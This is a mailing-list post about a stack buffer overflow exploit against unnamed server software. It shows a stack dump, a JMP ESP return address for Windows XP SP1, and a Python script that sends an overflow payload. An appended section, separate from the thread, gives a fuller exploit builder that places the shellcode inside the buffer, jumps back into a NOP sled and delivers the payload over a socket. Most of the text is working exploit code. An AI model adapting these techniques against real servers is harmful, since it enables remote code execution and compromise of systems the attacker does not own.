Metasploit mailing list archives
No room for shellcode
From: allendb760 at googlemail.com (DB Allen)
Date: Sat, 2 May 2009 17:31:04 +0100
It's not a specific metasploit question - but I did use metasploit to
generate the shellcode :-). I'm trying to write an exploit for a popular
server-based piece of software but don't have room for the shellcode anywhere.
Here is a copy of the stack (doing this on XP SP1, so no DEP):
Address  Value    ASCII
00A4FD40 41414141 AAAA
00A4FD44 41414141 AAAA
00A4FD48 41414141 AAAA
00A4FD4C 41414141 AAAA
00A4FD50 41414141 AAAA
00A4FD54 77D718FC ??w USER32.77D718FC -> JMP ESP
00A4FD58 90909090 ????
00A4FD5C 90909090 ???? -> ESP
00A4FD60 90909090 ????
00A4FD64 90909090 ????
00A4FD68 4DEB6AFC ?j?M -> Shellcode start (should be 317 bytes)
00A4FD6C FFFFF9E8 ????
00A4FD70 6C8B60FF ?`?l
00A4FD74 458B2424 $$?E
00A4FD78 057C8B3C <?|
00A4FD7C 8BEF0178 x??
00A4FD80 5F8B184F O?_
00A4FD84 49EB0120 ?I
00A4FD88 018B348B ?4?
00A4FD8C 99C031EE ?1??
00A4FD90 74C084AC ???t
00A4FD94 20CAC107 ?? -> Shellcode goes tits up.
00A4FD98 746E6320 xxxx -> Normal program code (obfuscated)
00A4FD9C 6C492072 xxxx
00A4FDA0 6167656C xxxx
00A4FDA4 7375206C xxxx
00A4FDA8 64697265 xxxx Pointer to next SEH record
00A4FDAC 6F4C202E xxxx SE handler
00A4FDB0 206E6967 xxxx
The buffer is 480 bytes to cause the overflow.
Here is the relevant bit of Python:
import socket

#JMP ESP XP SP1
jmp_sp1 = '\xfc\x18\xd7\x77'
user = 'USER '
buff = "A" * 480
NOP = '\x90'
# shellcode: the 317-byte payload generated with metasploit (not reproduced in the post)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.2.4', XXXX))  # port redacted in the original post
s.recv(1024)
while 1:
    s.send(user + buff + jmp_sp1 + NOP * 16 + shellcode + "\r\n")
I'm thinking that I can include the shellcode as part of the buffer and find
a static JMP [ESP-xxx] in memory, that could send the execution flow back
into the buffer and to the shellcode.
Is this a normal method to choose? Also is it reliable across OSes of the
same service pack?
If there is a better way, I'd love to hear it.
Thanks,
DB
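As an added illustration of the layout question raised in the post (this is not the poster's code, nor anything from the thread replies), the example below keeps the poster's USER prefix, 480-byte overflow and JMP ESP address but moves the 317-byte shellcode into the 'A' region in front of the saved return address. The few bytes that survive after ESP then hold only a 5-byte near jump (E9 rel32) back into a NOP sled in front of the shellcode. Because both ends of the jump sit in the same contiguous buffer, the displacement depends only on the buffer layout, not on any absolute stack address, so no second static JMP [ESP-xxx] gadget is needed. The shellcode bytes, the 8-byte NOP pad after the return address (covering the gap the stack dump shows between the popped return address and ESP) and the target host/port are constructed placeholders and assumptions, not values from the post.

```python
import socket
import struct

# Constructed stand-in for the 317-byte metasploit payload; replace with the real shellcode.
FAKE_SHELLCODE = b"\xcc" * 317

PREFIX = b"USER "               # command prefix from the post
BUF_LEN = 480                   # bytes needed to reach the saved return address (from the post)
JMP_ESP = b"\xfc\x18\xd7\x77"   # USER32.77D718FC, JMP ESP on the poster's XP SP1 box
NOP = b"\x90"
AFTER_RET_PAD = 8               # ASSUMPTION: NOPs between the return address and the jump stub,
                                # covering the gap between the popped ret and ESP in the dump


def build_payload(shellcode, prefix=PREFIX, buf_len=BUF_LEN, ret=JMP_ESP,
                  sled_len=16, after_ret_pad=AFTER_RET_PAD):
    """Return (payload, sled_index).

    Layout: prefix | NOP filler | NOP sled | shellcode | ret | NOP pad | E9 rel32 | CRLF
    The overflow region that used to be all 'A' now carries the sled and shellcode;
    only a 5-byte jump has to survive in the clobbered area after ESP.
    """
    if len(shellcode) + sled_len > buf_len:
        raise ValueError("shellcode + sled does not fit in the overflow buffer")
    filler = NOP * (buf_len - sled_len - len(shellcode))
    body = filler + NOP * sled_len + shellcode          # exactly buf_len bytes
    sled_index = len(prefix) + len(filler)              # where the jump should land
    stub_index = len(prefix) + buf_len + len(ret) + after_ret_pad
    # E9 rel32 jumps to (address of next instruction + rel32); the 5 is the stub length.
    # Both indices are offsets into one contiguous buffer, so rel32 is address independent.
    rel32 = sled_index - (stub_index + 5)
    stub = b"\xe9" + struct.pack("<i", rel32)
    payload = prefix + body + ret + NOP * after_ret_pad + stub + b"\r\n"
    return payload, sled_index


def decode_jump(payload, stub_index):
    """Follow the E9 rel32 at stub_index and return the index it lands on."""
    if payload[stub_index] != 0xE9:
        raise ValueError("no near jump at stub_index")
    rel32 = struct.unpack("<i", payload[stub_index + 1:stub_index + 5])[0]
    return stub_index + 5 + rel32


def check_layout(payload, shellcode, prefix=PREFIX, buf_len=BUF_LEN,
                 ret=JMP_ESP, after_ret_pad=AFTER_RET_PAD):
    """Sanity check before sending: ret in place, shellcode ends at ret, jump lands in the sled."""
    ret_index = len(prefix) + buf_len
    stub_index = ret_index + len(ret) + after_ret_pad
    landing = decode_jump(payload, stub_index)
    sc_index = payload.index(shellcode)
    lands_in_sled = landing < sc_index and all(b == 0x90 for b in payload[landing:sc_index])
    return (payload[ret_index:ret_index + len(ret)] == ret
            and sc_index + len(shellcode) == ret_index
            and lands_in_sled)


def send_payload(host, port, payload):
    """Deliver one payload; host/port are caller assumptions (the post redacts the port)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.recv(1024)
    s.send(payload)
    s.close()


if __name__ == "__main__":
    payload, sled = build_payload(FAKE_SHELLCODE)
    print("payload %d bytes, sled at %d, layout ok: %s"
          % (len(payload), sled, check_layout(payload, FAKE_SHELLCODE)))
```

The stub plus its NOP pad is 13 bytes, well inside the roughly 0x38 bytes that the dump shows surviving between ESP (00A4FD5C) and the point where the shellcode was clobbered (00A4FD94); the NOP pad also absorbs a few bytes of ESP drift between runs. What this does not fix is the JMP ESP address itself, which is a USER32 offset specific to one Windows build and service pack, so that is the part to re-verify on each target.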